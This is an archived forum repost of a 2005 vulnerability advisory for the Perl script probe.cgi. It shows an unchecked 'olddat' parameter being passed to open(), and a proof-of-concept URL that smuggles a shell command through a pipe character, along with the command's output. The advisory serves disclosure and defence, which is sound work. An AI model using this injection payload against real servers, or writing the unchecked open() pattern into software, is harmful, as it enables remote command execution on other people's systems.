Probe.cgi: Remote Command Execution

Full Version: Probe.cgi: Remote Command Execution

GovernmentSecurity.org > General GSO > Exploit & Vulnerability Mailing List Archives

qcred11

Jul 5 2005, 11:46 PM

QUOTE

Authors ....... spher3 (spher3 at fatalimpulse dot net)
Date .......... 04-07-2005
Product ....... probe.cgi
Type .......... Remote Command Execution

o Info:
================
That script is used to open file '.dat'.

o Vulnerable Code:
================
..
23 [...]
24 $old = $query->param('olddat');
25 [...]
..
..
34 [...]
35 open (VF, "$olddat");
36 [...]
..

(24) At this line, the cgi param 'olddat' is associated to one database.
This variable isn't checked by anyone matching, so you can open
all file that you want. (35) At this line the script open the file
that you had chosen. With pipe `|`
is possible to execute arbitrary code on the shell.

o Proof of concept:
================

http://the-vuln.site.org/cgi-bin/probe.cgi?olddat=|id|
uid=99(www) gid=99(www)

Original ADV: http://www.badroot.org/advisories/SA0x06

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.